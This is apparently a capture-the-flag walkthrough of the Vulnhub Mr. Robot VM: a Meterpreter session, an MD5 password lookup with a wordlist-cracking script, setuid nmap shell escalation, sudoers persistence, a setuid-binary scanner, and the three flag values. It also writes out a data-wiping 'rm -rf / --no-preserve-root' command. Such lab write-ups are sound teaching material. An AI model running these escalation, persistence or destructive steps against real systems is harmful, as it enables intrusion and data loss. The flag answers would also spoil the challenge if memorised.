1 meterpreter php/linux daemon (1) @ linux 192.168.159.131:443 -> 192.168.159.130:39959 (192.168.159.130)
msf exploit(handler) >
Type "help sessions" to see the options for interacting with sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now I can connect to session 1 using -i, which interacts with the supplied session ID.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in the session. The session table shows "php/linux daemon (1)", so commands run as the web server user daemon, not root. From here I can run commands on the Mr.Robot machine, e.g. ls and pwd.
meterpreter > ls
--- snip ---
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-admin
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see the robot directory, continue digging ...
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In the /home/robot directory, two files are found:
  1. key-2-of-3.txt
  2. password.raw-md5
I can't read "key-2-of-3.txt" because its mode is 0400 (r--------): only the owner, user robot, can read it, and my Meterpreter session runs as daemon. See the error below. "password.raw-md5" is world-readable (rw-r--r--), so that one works.
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >
The line "robot:c3fcd3d76192e4007dfb496cca67e13b" is username:MD5 hash, as the .raw-md5 file name suggests. MD5 is a hash, not encryption, so it cannot be "decrypted", but an unsalted MD5 can be looked up or brute-forced: the online lookup tool hashkiller.co.uk maps "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow, the password is so basic; it is literally one of the MD5 test vectors from RFC 1321, so every lookup table has it. If I had run a password cracker with a common wordlist earlier, I'm sure it would have found this in under 2 minutes. Anyway, let me log in to the Mr.Robot box using username robot and password abcdefghijklmnopqrstuvwxyz.
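The offline version of that lookup, as an added example that is not part of the original post: parse the user:hash line, hash each wordlist entry with MD5 and compare. The in-memory copy of password.raw-md5 and the six-word list are constructed so the script runs offline; a real run would read fsocity.dic or rockyou.txt instead of WORDLIST.

```python
"""Offline MD5 check of a user:hash line such as the one in password.raw-md5.

Added example, not code from the original post. The hash is the one found on
the box; the wordlist and the in-memory copy of the file are constructed.
"""
import hashlib
from typing import Dict, Iterable

# Constructed copy of the one-line file read over Meterpreter above.
PASSWORD_RAW_MD5 = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed wordlist; the duplicate is deliberate, dictionary files are full of them.
WORDLIST = ["password", "elliot", "ER28-0652", "ER28-0652",
            "abcdefghijklmnopqrstuvwxyz", "Admin123"]

HEX_DIGITS = set("0123456789abcdef")


def parse_raw_md5(text: str) -> Dict[str, str]:
    """Parse user:hash lines, keeping only well-formed 32-hex-digit MD5 values."""
    creds = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and set(digest) <= HEX_DIGITS:
            creds[user.strip()] = digest
    return creds


def md5_hex(candidate: str) -> str:
    """Raw, unsalted MD5 of the candidate, as hex (hashcat mode 0)."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def crack(creds: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {user: password} for every hash hit by a wordlist entry."""
    by_hash = {digest: user for user, digest in creds.items()}
    found: Dict[str, str] = {}
    # Deduplicate while keeping order so each candidate is hashed once.
    for word in dict.fromkeys(w.rstrip("\r\n") for w in wordlist):
        digest = md5_hex(word)
        if digest in by_hash:
            found[by_hash[digest]] = word
            if len(found) == len(by_hash):
                break
    return found


if __name__ == "__main__":
    print(crack(parse_raw_md5(PASSWORD_RAW_MD5), WORDLIST))
```

For anything bigger than a toy list use hashcat -m 0 (raw MD5) or john --format=raw-md5 rather than a Python loop; the point of the script is only that an unsalted fast hash offers no protection once the file is readable.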
[Screenshot: que-com-ctp-mr-robot-boxaccess]
Successfully logged in as robot with password abcdefghijklmnopqrstuvwxyz. Run ls to check the directory listing.
[Screenshot: que-com-ctp-mr-robot-list]
Run "cat key-2-of-3.txt" to view the file.
[Screenshot: que-com-ctp-mr-robot-key2]
Check whether I can "ls /root".
[Screenshot: que-com-ctp-mr-robot-list-root]
Oops ... it seems I need more research to get root access.
After long hours of research and reading other penetration testing website/blogs...
I checked the nmap version on the Mr.Robot box.
[Screenshot: que-com-ctp-mr-robot-nmap]
Old nmap versions have an --interactive mode in which !command runs a shell command, and if the nmap binary is setuid root that command runs with root's effective uid. I can run "nmap --interactive" and use !bash to start a shell.
[Screenshot: que-com-ctp-mr-robot-nmap-bash]
No luck: bash drops its effective uid back to the real uid when the two differ (unless started with -p), so the shell it spawns is still robot.
Now trying !sh, which keeps the effective uid. Type "exit" to get out of the shell.
[Screenshot: que-com-ctp-mr-robot-nmap-sh-key3]
It's a success with !sh. /root/firstboot_done is empty, and /root/key-3-of-3.txt gives our key "04787ddef27c3dee1ee161b21670b4e4".
At this point I have discovered 2 out of 3 keys, as listed below.
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
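The check that replaces "long hours of research" next time, as an added example that is not part of the original post: the escalation above only works because the nmap binary is setuid root, and setuid binaries are easy to enumerate (the equivalent one-liner is find / -perm -4000 -type f -user root 2>/dev/null). The scanner below walks a tree, reports setuid files owned by a given uid, and flags names on a short, illustrative list of binaries that hand out a shell when setuid; the list is not complete, and the temporary directory used to exercise it is constructed. In the Meterpreter ls output above, such a file would show a mode beginning 1047xx instead of 1007xx.

```python
"""Enumerate setuid binaries and flag the ones worth a second look.

Added example, not code from the original post. SHELL_CAPABLE is an
illustrative shortlist, not a complete catalogue.
"""
import os
import stat
from typing import Iterable, List

# Illustrative shortlist of binaries that give a shell when setuid root:
# old nmap via --interactive and !sh, find via -exec /bin/sh -p, bash -p, etc.
SHELL_CAPABLE = {"nmap", "find", "vim", "bash", "python", "perl", "awk"}


def is_setuid_owned_by(st: os.stat_result, uid: int = 0) -> bool:
    """True for a regular file with the setuid bit whose owner is `uid`."""
    return (stat.S_ISREG(st.st_mode)
            and bool(st.st_mode & stat.S_ISUID)
            and st.st_uid == uid)


def find_setuid(root: str, uid: int = 0) -> List[str]:
    """Walk `root` (not following symlinks) and return setuid files owned by `uid`."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file itself, not a link target
            except OSError:
                continue  # unreadable or vanished; keep scanning
            if is_setuid_owned_by(st, uid):
                hits.append(path)
    return sorted(hits)


def flag_shell_capable(paths: Iterable[str]) -> List[str]:
    """Keep only hits whose basename is on the shortlist, for manual review."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]


if __name__ == "__main__":
    # On a real box scan "/" as the low-privilege user; /usr keeps the demo quick.
    suid = find_setuid("/usr")
    review = set(flag_shell_capable(suid))
    for p in suid:
        print(p + ("  <-- review" if p in review else ""))
```

Run it as the unprivileged user you landed as; anything flagged should be checked against the binary's version, since --interactive was removed from nmap years ago and only old builds like the one on this box still have it.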
What's next after getting a root shell? I'm not done yet: my user robot is still a standard account, and the root shell only lives inside nmap. I can make the escalation permanent by adding "robot ALL=(ALL) ALL" to the sudoers file. I typed nano /etc/sudoers to add the line; the safer tool is visudo, which locks the file and refuses to save a syntax error that would otherwise lock everyone out of sudo (visudo -c checks an existing file).
[Screenshot: que-com-ctp-mr-robot-nano-sudoers]
Save it. Exit the !sh shell, quit nmap, run sudo ls and enter the robot password. If everything goes well, I can run sudo su to become root.
[Screenshot: que-com-ctp-mr-robot-rooted]
Rooted!
From here I can do anything to the Mr.Robot virtual machine; I could even wipe the box with "rm -rf / --no-preserve-root".
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the http://192.168.159.130/robots/ web page got nothing.
Checking the http://192.168.159.130/robots.txt file shows interesting information: fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Run wget http://192.168.159.130/fsocity.dic:
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/fsocity.dic
--2016-12-03 15:13:04-- http://192.168.159.130/fsocity.dic
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
fsocity.dic is 6.91 MB; it is probably a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/key-1-of-3.txt
--2016-12-03 15:14:47-- http://192.168.159.130/key-1-of-3.txt
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
key-1-of-3.txt is only 33 bytes: a 32-character hex string plus a newline.
I run cat fsocity.dic to check the content and confirm it is a dictionary file. cat key-1-of-3.txt gives this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walkthrough. I will create a follow-up video later this week.
And I'm still catching up on all the challenges provided by the Vulnhub.com website.
Thank you,
Useful links: